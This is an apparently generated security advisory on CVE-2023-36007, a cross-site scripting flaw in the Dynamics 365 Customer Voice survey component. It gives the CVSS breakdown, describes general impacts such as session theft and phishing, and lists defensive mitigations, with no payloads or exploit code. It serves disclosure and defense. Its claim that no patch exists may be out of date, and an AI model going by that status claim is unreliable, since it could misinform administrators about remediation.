CVE-2023-36007 is a high-severity cross-site scripting (XSS) vulnerability identified in the Microsoft Send Customer Voice survey component of the Dynamics 365 application, specifically affecting version 1.0.0.0. The vulnerability is classified under CWE-79, which involves improper neutralization of input during web page generation. This flaw allows an attacker with limited privileges (requires low privileges and user interaction) to inject malicious scripts into web pages generated by the application. The vulnerability has a CVSS 3.1 base score of 7.6, indicating a high impact primarily on confidentiality, with partial impact on integrity and no impact on availability. The attack vector is network-based (AV:N), with low attack complexity (AC:L), but requires privileges (PR:L) and user interaction (UI:R). The scope is changed (S:C), meaning the vulnerability affects components beyond the initially vulnerable component, potentially impacting other parts of the system or connected services. The vulnerability can lead to significant confidentiality breaches, such as theft of sensitive customer data or session tokens, by executing malicious scripts in the context of authenticated users. The integrity impact is limited but could allow attackers to manipulate displayed content or conduct phishing attacks within the trusted application interface. No known exploits are currently reported in the wild, and no patches have been published yet. The vulnerability was reserved in June 2023 and published in November 2023, indicating recent discovery and disclosure. The lack of a patch means organizations using the affected version remain exposed to potential exploitation if attackers develop working exploits.

For European organizations, especially those using Microsoft Dynamics 365 with the Send Customer Voice survey app, this vulnerability poses a significant risk to customer data confidentiality and trust. The ability to execute malicious scripts in the context of authenticated users can lead to data leakage, session hijacking, and targeted phishing campaigns. Organizations in sectors such as finance, healthcare, retail, and public administration that rely on Dynamics 365 for customer engagement and feedback collection are particularly vulnerable. The cross-site scripting flaw could be leveraged to bypass security controls, steal sensitive information, or manipulate survey data, undermining data integrity and compliance with data protection regulations like GDPR. Additionally, the scope change in the vulnerability suggests potential lateral impact on connected systems or services, increasing the risk of broader compromise. The requirement for user interaction and privileges limits the attack surface somewhat but does not eliminate risk, especially in environments with many users or where privilege escalation is possible. The absence of known exploits in the wild provides a window for mitigation, but the high CVSS score and the critical nature of customer data handled by the app necessitate urgent attention.

Immediately review and restrict user privileges within Dynamics 365 to the minimum necessary, reducing the number of users with rights to send or manage Customer Voice surveys. Implement strict input validation and output encoding on all user-supplied data within the Customer Voice survey workflows to prevent script injection, even before an official patch is available. Use Content Security Policy (CSP) headers tailored to restrict execution of unauthorized scripts in the Dynamics 365 environment, mitigating the impact of potential XSS payloads. Monitor logs and user activity for unusual behavior related to survey creation or distribution, focusing on attempts to inject scripts or anomalous user interactions. Educate end users and administrators about the risks of interacting with suspicious survey links or content, emphasizing the need for caution with unexpected or unsolicited surveys. Coordinate with Microsoft support and subscribe to official security advisories to obtain patches or workarounds as soon as they are released. Consider temporarily disabling the Send Customer Voice survey feature if feasible until a patch is applied, especially in high-risk environments handling sensitive data. Conduct penetration testing focused on XSS vectors within the Dynamics 365 Customer Voice module to identify and remediate any additional injection points.